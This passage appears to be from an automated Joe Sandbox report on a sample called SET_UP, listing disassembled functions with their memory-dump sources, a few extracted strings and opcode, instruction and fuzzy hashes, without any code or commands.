                                                                                                                                                                                                  • Opcode Fuzzy Hash: acc8b7a53dbbd0123d2eaf865458676f59ae11da534f35f33e2560bf137fdd1a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4D1B070B007108BC718EE299855B6FB7D1AFC9714F141A1EF5668B3D0CBB99D068B8A
                                                                                                                                                                                                  Function 004841F1 Relevance: 2.2, Strings: 1, Instructions: 908COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ,)P
                                                                                                                                                                                                  • API String ID: 0-3778783369
                                                                                                                                                                                                  • Opcode ID: 58981f3f00ae2510bd52b7fc36a66af10b0968ae765d24fd06e3c2d7e2b42834
                                                                                                                                                                                                  • Instruction ID: d7941b517d8358b44f4d42ddf6ab973d179af12006e9fefa380875bce8641912
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58981f3f00ae2510bd52b7fc36a66af10b0968ae765d24fd06e3c2d7e2b42834
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD725D716087028FCB18EF18D49066EB7E2FFC9304F14496EE8968B785E778D945CB86
                                                                                                                                                                                                  Function 004857F0 Relevance: 2.1, Strings: 1, Instructions: 837COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ,+P
                                                                                                                                                                                                  • API String ID: 0-3540896267
                                                                                                                                                                                                  • Opcode ID: 9e8d729ec05c48d1d3df0ff96f1d213b7395ed71362c899847de2dd40e6ec837
                                                                                                                                                                                                  • Instruction ID: d741632ffd3c571c0ed3bd8caf1626c6c621062a23966496b2ee7024da6fd6a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e8d729ec05c48d1d3df0ff96f1d213b7395ed71362c899847de2dd40e6ec837
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B624C74600B018FC738DF19D990A6BB7E2EF95710B148E2EE88687B51D734F846CBA5
                                                                                                                                                                                                  Function 0047C1B0 Relevance: 1.9, Strings: 1, Instructions: 687COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • invalid background gamma type, xrefs: 0047C7C5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: invalid background gamma type
                                                                                                                                                                                                  • API String ID: 0-4261572729
                                                                                                                                                                                                  • Opcode ID: deed05f29db1c6a2c345970db5f722a31cea38dde984c2b4f813ea0080297780
                                                                                                                                                                                                  • Instruction ID: d120dc93561b91b4b821a1ef1c41bbf2de5f912ed2dadb198b86efa35d6dd8c6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: deed05f29db1c6a2c345970db5f722a31cea38dde984c2b4f813ea0080297780
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE52F534108B828AC3359F38C4917F7FBE1AF9A304F48896ED5EE8B352E635A505C759
                                                                                                                                                                                                  Function 004A16C4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000A167E), ref: 004A16C9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                  • Opcode ID: 07bec4ec5c699375a5376d3ff952c806028238ded2c07c693cb4338a31fc0ddf
                                                                                                                                                                                                  • Instruction ID: 802aff5ecf18598f3ebd462c8d206112e6a35e66acd4f6df0414ca3a542bcc9c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07bec4ec5c699375a5376d3ff952c806028238ded2c07c693cb4338a31fc0ddf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21A022F02C0200CBC3002FB2AC08A083AB0BA22302B088023E800C02B0CF308008EE08
                                                                                                                                                                                                  Function 004A16D6 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 004A16DB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                  • Opcode ID: 48e1dffb7acb4389a14693901f702008cc83aff95d497a5c812d789d210e2ff1
                                                                                                                                                                                                  • Instruction ID: fa3034864e1d0725412c2495c5039eb2806708af004212546cec351432f0c307
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48e1dffb7acb4389a14693901f702008cc83aff95d497a5c812d789d210e2ff1
                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                  Function 004A5C25 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ompare
                                                                                                                                                                                                  • API String ID: 0-725164280
                                                                                                                                                                                                  • Opcode ID: 497c61a0cd65834f02c95462c1b0b00274afc69f4e00a6447d3e74505aafd688
                                                                                                                                                                                                  • Instruction ID: 7a823543d77c5db44c62beaa77dd766168e1fbe464ab6cd71dd932582fcbb18a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 497c61a0cd65834f02c95462c1b0b00274afc69f4e00a6447d3e74505aafd688
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5416873D506208BD358DFB4ED8512E76A2F3F0215347823ED812DB628EE78490ADBD5
                                                                                                                                                                                                  Function 004197D1 Relevance: .8, Instructions: 809COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d31d984f6109f0aceafa58f2be50b36fe85a98c9e6cf3cd511b809fb2f8aad12
                                                                                                                                                                                                  • Instruction ID: c909be6a8d274d51bd36736790b99fd829c8aa16919a48df3a90794d13bb78f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d31d984f6109f0aceafa58f2be50b36fe85a98c9e6cf3cd511b809fb2f8aad12
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C528036B4060A9BEB0CCE9ACCD15DCB7A3ABC835475DC23CD915D7745DAB8A907CA80
                                                                                                                                                                                                  Function 0046CF40 Relevance: .7, Instructions: 749COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 49d4a15e9708ae2a5a106d74a7fd5ca7f5903ee933b1440a704aae380eaad65a
                                                                                                                                                                                                  • Instruction ID: 1bc43709e74c112ee2d0ec7aec491f8ba11b061444838b57cbeaa7163fdad417
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49d4a15e9708ae2a5a106d74a7fd5ca7f5903ee933b1440a704aae380eaad65a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3628D72A0431A8FC718CF5CC4D44AABBA2FFC8344F0A4A6DD95657359E770AA1DCB81
                                                                                                                                                                                                  Function 0046D820 Relevance: .7, Instructions: 671COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cda0dbc2db8251d874122c81a280e49f96d32a2933b0a13611cc528affee71eb
                                                                                                                                                                                                  • Instruction ID: 2828555381cda311db8745c7ba8bdce0349df8e9854191adcd5c0bc23ccec5d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cda0dbc2db8251d874122c81a280e49f96d32a2933b0a13611cc528affee71eb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB623B7150830A8FC714CF5CC4D08AAB7E2FF88348F454A6DE55697269EB70B62ECB81
                                                                                                                                                                                                  Function 0047D940 Relevance: .6, Instructions: 589COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bbb0c6ee9574c6a1f4a87c026dabde44d542f094146542d0a39c3a894911509d
                                                                                                                                                                                                  • Instruction ID: 92b62490abde3b6690ca18bacb72bcb13675fe8d232fb90f9e4b7d9e4ee6193f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbb0c6ee9574c6a1f4a87c026dabde44d542f094146542d0a39c3a894911509d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E32803151C3828FC325CF28C4516AAFBE1BF9A304F184ABEE5C99B342C625D946C796
                                                                                                                                                                                                  Function 0046C850 Relevance: .6, Instructions: 566COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 28b3f4f82802e420b2c33082e7c838a7aa424de627a38d1fe7018a1a32419c69
                                                                                                                                                                                                  • Instruction ID: 6d7d3cea71c1beb4378e3885c867dcaae117df7c127de59a5a30c5816751c191
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28b3f4f82802e420b2c33082e7c838a7aa424de627a38d1fe7018a1a32419c69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C42377260870A8FC714CF5CD88049AFBA2FBC8344F464A2DE59967319DB70B61ACB81
                                                                                                                                                                                                  Function 00441680 Relevance: .4, Instructions: 399COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f488a2e983e6f0615bcf1b47cd59c33483f05da0cdcdfbdfd26793ea948b1873
                                                                                                                                                                                                  • Instruction ID: 10c4cc43ab90f04abba7d18c49e7a690c9fc8cf510f5fdf3e25ee55280f808f5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f488a2e983e6f0615bcf1b47cd59c33483f05da0cdcdfbdfd26793ea948b1873
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE1C0716083418BD728DF19C591AAFB7E2FFC8704F04492EF89A93351DB34A949CB96
                                                                                                                                                                                                  Function 00488F00 Relevance: .4, Instructions: 379COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
                                                                                                                                                                                                  • Instruction ID: e594c3dc3f34ca01830c35ca485afd79e50fcf93e2484f85403e2775cfb04069
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c324fae35605e0318178e989c7bf8fd9c7c74e6d59fe310db041826096156942
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9F1BEB250D6408FC3098F18D4989F6BBE6EF98714B1F46FEC4499B362D3329981CB95
                                                                                                                                                                                                  Function 00489480 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
